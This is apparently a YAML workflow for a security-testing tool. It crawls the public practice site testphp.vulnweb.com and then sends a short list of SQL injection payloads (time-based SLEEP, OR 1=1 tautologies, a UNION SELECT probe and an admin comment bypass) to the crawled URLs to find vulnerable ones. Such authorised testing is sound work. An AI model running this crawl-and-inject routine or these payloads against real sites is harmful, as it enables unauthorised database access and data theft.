name: SQL Injection Test

stages:
  - name: Reconnaissance
    steps:
      - action: Get urls of site
        HttpPlugin.crawl_website:
          start_url: "http://testphp.vulnweb.com/"
          max_depth: 2
          max_pages: 100
        success_criteria:
          - at_least_one_url_found
        continue_on_failure: false
        output_variable: crawled_urls

  - name: SQL Injection Testing
    steps:
      - action: Test SQL Injection
        HttpPlugin.test_sql_injection:
          urls: ${crawled_urls}
          payloads:
            - "' AND SLEEP(5)--"
            - "' OR '1'='1"
            - "1 OR 1=1"
            - "' UNION SELECT NULL, NULL, NULL--"
            - "admin' --"
        success_criteria:
          - vulnerable_urls_found
        output_variable: vulnerable_urls

on_failure:
  - action: log_failure
    LoggingPlugin.log_failure:
      message: "SQL Injection test workflow execution failed"

on_completion:
  - action: log_success
    LoggingPlugin.log_success:
        message: "SQL Injection test workflow execution completed successfully"
        output: ${vulnerable_urls}
